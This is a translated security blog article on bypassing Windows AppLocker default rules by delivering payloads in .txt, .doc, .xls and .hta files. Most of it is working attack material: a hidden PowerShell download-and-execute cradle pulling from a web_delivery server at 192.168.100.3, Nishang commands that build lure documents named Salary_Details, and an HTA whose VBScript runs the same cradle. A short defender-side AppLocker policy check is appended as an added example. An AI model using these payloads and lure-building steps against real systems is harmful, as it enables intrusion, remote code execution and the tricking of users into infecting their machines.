This article covers: how I bypass AppLocker using file extensions
Bypassing AppLocker restrictions usually means either executing code through a Microsoft-trusted binary or abusing weak path rules. However, on a system where only the default rules have been configured, and where the command prompt and PowerShell are therefore allowed, AppLocker can be bypassed simply by delivering the payload in a file with a different extension.
exploit/multi/script/web_delivery
cmd.exe /K < payload.txt

Contents of payload.txt:

@echo off
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi');
PAUSE

IEX (new-object net.webclient).downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi');
DOC XLS HTA LNK
PS C:\nishang\Client> Import-Module .\Out-Word.ps1
PS C:\nishang\Client> Import-Module .\Out-Excel.ps1
PS C:\nishang\Client> Out-Word -Payload "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi');"
Saved to file C:\nishang\Client\Salary_Details.doc
0
PS C:\nishang\Client> Out-Excel -Payload "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.100.3:8080/9Q21wiSds9E0pxi');"
Saved to file C:\nishang\Client\Salary_Details.xls
0
PS C:\nishang\Client>
<HTML>
<HEAD>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.3:8080/9Q21wiSds9E0pxi')"
</script>
</HEAD>
<BODY>
</BODY>
</HTML>
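Every variant above depends on the same precondition: the default AppLocker rules leave cmd.exe, powershell.exe and the HTA host mshta.exe allowed for ordinary users. The following defender-side check is an added example, not code from the original article; it assumes it is run on the workstation being assessed with the built-in AppLocker module available, and evaluates the effective policy against exactly those hosts.

```powershell
# Added example (not from the article): ask the effective AppLocker policy
# whether the script hosts the bypass relies on are allowed for Everyone.
# Assumes a Windows host with the AppLocker module (Windows 7 / 2008 R2 and later).
Import-Module AppLocker

# Hosts used by the .txt, .doc/.xls and .hta carriers described above.
$scriptHosts = @(
    "$env:SystemRoot\System32\cmd.exe",
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",
    "$env:SystemRoot\System32\mshta.exe",
    "$env:SystemRoot\System32\wscript.exe"
)

# Export the effective (local + GPO merged) policy once as XML, then let
# AppLocker evaluate each path as a standard user would experience it.
$policyXml = Get-AppLockerPolicy -Effective -Xml
$decisions = Test-AppLockerPolicy -XmlPolicy $policyXml -Path $scriptHosts -User Everyone

$decisions | Select-Object FilePath, PolicyDecision, MatchingRule | Format-Table -AutoSize

# With only the default rules, every entry comes back "Allowed" via the
# %WINDIR% path rule, which is the gap this technique exploits; a hardened
# policy shows "Denied" for the hosts standard users do not need.
$allowed = $decisions | Where-Object { $_.PolicyDecision -eq 'Allowed' }
if ($allowed) {
    $names = ($allowed.FilePath | ForEach-Object { Split-Path $_ -Leaf }) -join ', '
    Write-Warning "Script hosts allowed for Everyone: $names"
}
```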
Original publication date: 14 June 2017
Author: 李白
This article comes from the Yunqi Community partner 嘶吼; for more information, follow the 嘶吼 website.